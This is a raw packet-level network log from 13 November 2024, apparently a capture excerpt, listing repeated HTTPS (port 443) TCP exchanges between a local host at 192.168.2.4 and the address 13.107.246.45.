Nov 13, 2024 18:44:29.207998991 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.208067894 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.208159924 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.208180904 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.246946096 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.247344017 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.247390032 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.247628927 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.247657061 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.274621010 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.274710894 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.274800062 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.274883032 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.274883032 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.274924994 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.274956942 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.276494980 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.276530027 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.276652098 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.276767015 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.276784897 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.384553909 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.384608984 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.384749889 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.384790897 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.384790897 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.384809017 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.384824038 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.386686087 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.386709929 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.386781931 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.386887074 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.386904001 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.513329029 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.513396978 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.921732903 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.922142029 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.922204018 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.922519922 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.922533035 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.940927029 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.941225052 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.941262007 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.941663980 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.941674948 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.949819088 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.950268030 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.950311899 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.950823069 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.950834990 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.020613909 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.021183014 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.021215916 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.021684885 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.021692038 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.051893950 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.052061081 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.052145004 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.052180052 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.052196980 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.052210093 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.052216053 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.054693937 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.054784060 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.054888010 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.055022955 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.055047035 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.072331905 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.072483063 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.072618961 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.072637081 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.072643042 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.072654963 CET	49870	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.072659969 CET	443	49870	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.074469090 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.074553967 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.074636936 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.074745893 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.074783087 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.084887028 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.084913015 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.084956884 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.084985018 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.085014105 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.085150957 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.085165977 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.085195065 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.085202932 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.086998940 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.087089062 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.087179899 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.087276936 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.087311029 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.105648041 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.106000900 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.106013060 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.106374979 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.106383085 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.153314114 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.153354883 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.153398991 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.153698921 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.153744936 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.153764963 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.153783083 CET	49871	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.153789997 CET	443	49871	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.156058073 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.156100035 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.156179905 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.156320095 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.156330109 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.233422995 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.233478069 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.233694077 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.233694077 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.233694077 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.235831022 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.235924959 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.236031055 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.236159086 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.236177921 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.544533968 CET	49872	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.544569969 CET	443	49872	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.808660030 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.809185028 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.809252024 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.809536934 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.809596062 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.835449934 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.835947037 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.836011887 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.836241007 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.836256027 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.855393887 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.855781078 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.855829000 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.856123924 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.856153011 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.937390089 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.938014984 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.938086987 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.938349009 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.938349009 CET	49873	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.938421965 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.938465118 CET	443	49873	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.940928936 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.940968990 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.941030979 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.941145897 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.941162109 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.968276024 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.968344927 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.968439102 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.968453884 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.968514919 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.968554974 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.968555927 CET	49875	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.968595028 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.968626022 CET	443	49875	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.970349073 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.970416069 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.970488071 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.970587969 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.970613003 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.976012945 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.976298094 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.976342916 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:30.976633072 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:30.976645947 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.017143965 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.017522097 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.017553091 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.017858982 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.017894983 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.087040901 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.087208986 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.087430954 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.087430954 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.087430954 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.089911938 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.090001106 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.090114117 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.090262890 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.090282917 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.109853029 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.109877110 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.109915018 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.109978914 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.110198975 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.110217094 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.110227108 CET	49877	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.110233068 CET	443	49877	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.115881920 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.115930080 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.116019011 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.116120100 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.116136074 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.145737886 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.145807981 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.145886898 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.146050930 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.146073103 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.146089077 CET	49876	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.146095991 CET	443	49876	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.148461103 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.148549080 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.148648977 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.148829937 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.148868084 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.310249090 CET	49874	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.310281038 CET	443	49874	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.683495998 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.687972069 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.688016891 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.688317060 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.688324928 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.709095955 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.713085890 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.713099003 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.722003937 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.722022057 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.827383995 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.827559948 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.827641964 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.829341888 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.829343081 CET	49878	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.829365015 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.829377890 CET	443	49878	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.832284927 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.832334995 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.832401037 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.832541943 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.832549095 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.836339951 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.836641073 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.836649895 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.837016106 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.837019920 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.840929985 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.843128920 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.843192101 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.847831964 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.847981930 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.848045111 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.849108934 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.849167109 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.852152109 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.852186918 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.852215052 CET	49879	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.852231026 CET	443	49879	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.857673883 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.857762098 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.857908964 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.860630989 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.860717058 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.890650988 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.891062021 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.891149044 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.891417980 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.891474009 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.965042114 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.965231895 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.965282917 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.965317965 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.965328932 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.965359926 CET	49881	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.965368032 CET	443	49881	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.967253923 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.967273951 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.967323065 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.967422009 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.967427969 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.979624987 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.979780912 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.979872942 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.979872942 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.979872942 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.981987000 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.982074976 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:31.982449055 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.982449055 CET	49886	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:31.982583046 CET	443	49886	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.025129080 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.025212049 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.025562048 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.025563002 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.026734114 CET	49882	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.026772976 CET	443	49882	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.027226925 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.027244091 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.027296066 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.027389050 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.027394056 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.294636011 CET	49880	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.294699907 CET	443	49880	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.612149954 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.612560034 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.612621069 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.612931013 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.612946033 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.630394936 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.630912066 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.631011009 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.631048918 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.631062984 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.721153975 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.721476078 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.721489906 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.721827030 CET	49885	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.721832037 CET	443	49885	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.750844955 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.751013994 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.751095057 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.751176119 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.751177073 CET	49883	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.751220942 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.751251936 CET	443	49883	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.753520966 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.753614902 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.753707886 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.753808975 CET	49888	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.753835917 CET	443	49888	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.758965969 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.759252071 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.759264946 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.759587049 CET	49887	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.759592056 CET	443	49887	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.765136957 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.765424967 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.765503883 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.765599966 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.765599966 CET	49884	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.765642881 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.765672922 CET	443	49884	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.767723083 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.767812014 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.767895937 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.768026114 CET	49889	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:32.768081903 CET	443	49889	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:32.852281094 CET	443	49885	13.107.246.45	192.168.2.4
